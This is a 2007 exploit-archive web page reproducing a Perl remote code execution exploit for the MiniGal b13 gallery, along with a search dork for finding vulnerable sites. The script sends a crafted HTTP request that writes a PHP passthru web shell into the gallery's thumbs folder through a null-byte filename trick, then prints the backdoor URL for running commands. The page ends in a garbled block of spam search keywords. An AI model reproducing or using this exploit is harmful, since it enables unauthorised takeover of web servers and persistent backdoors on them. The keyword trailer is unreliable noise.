about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MiniGal b13 (image backdoor) Remote Code Execution Exploit



2007-04-17 MiniGal b13 (image backdoor) Remote Code Execution Exploit
Rated as : Moderate Risk

#!/usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                        # MiniGal b13 

# -=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

# -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# * Author :

            # Dj7xpl / Dj7xpl[at]Yahoo[dot]com

# * Type :

            # Remote Code Execution Exploit

# * Download :

            # http://www.minigal.dk
			
# * D0rk :

            # Powered by MiniGal (b13)

# -=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

# -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
use IO::Socket;
if (@ARGV < 3){
print "

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*                                                                         
   *
*    MiniGal b13  Remote Code Execution Exploit                           
   *
*                                                                         
   *
*    Usage   :  Xpl.pl [Target] [Path] [Backd00r Name] [Gallery Name]     
   *
*                                                                         
   *
*    Example :  Xpl.pl Dj7xpl.ir /minigal/ dj7xpl.php Pic                 
   *
*                                                                         
   *
*                    Vuln & Coded By Dj7xpl                               
   *
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

";
exit();
}
$code = "<?passthru(\$cmd);?>";
$host=$ARGV[0];
$path=$ARGV[1];
$backdoorname=$ARGV[2];
$listname=$ARGV[3];
print
"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "\n[~] MiniGal b13 Remote Code Execution Exploit Vuln&Coded By
Dj7xpl\n";sleep (2);
print "[~] Connect To http://".$host."\n";sleep (2);
print "[~] Create Backd00r";sleep (1);print ".";sleep
(1);print ".";sleep (1);print ".";sleep (1);print
".\n";sleep (1);
print "[~] Backd00r:
http://".$host."".$path."".$listname."/thumbs/".$backdoorname."?cmd=ls
-la\n\n";
print
"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

    $socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$host", PeerPort=>"80") or die
"Connect Failed.\n\n";
    print $socket "GET
".$path."index.php?input=".$code."&name=Dj7xpl&email=Dj7xpl@yahoo.com&chatinput=1&list=".$listname."&image=".$backdoorname."%00
HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";


# -=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

# Sp Tnx : Str0ke
securitydot.net - 2007-04-17

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 01:18:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sexy*video t31t courier Im multiple b http://Tra www.hotchi xifuyz.cn www.moy3g. www.transm shortage o www.taokez nfs vulner CVE-2007-3 www.80845. Crack Data www.12541. www.80845. www.smuss 200 /compo cinahcem y www.TAGTAG WWW.sex.co 200+%252Fc index.php% meena ass malicious GET /user_ www.smuss PHP+Pro+Bi snitz www.Sexwal tcpwrapper WWW.School World sex Sagilasex. Wap.sexygi Www.sexy.l Foto2 ngen netbula cr news for c Www.xnxx.c activation sexmovei Fubar_Foru 200 /admin mambo Remo plug and p sign slieny.com Bible Blac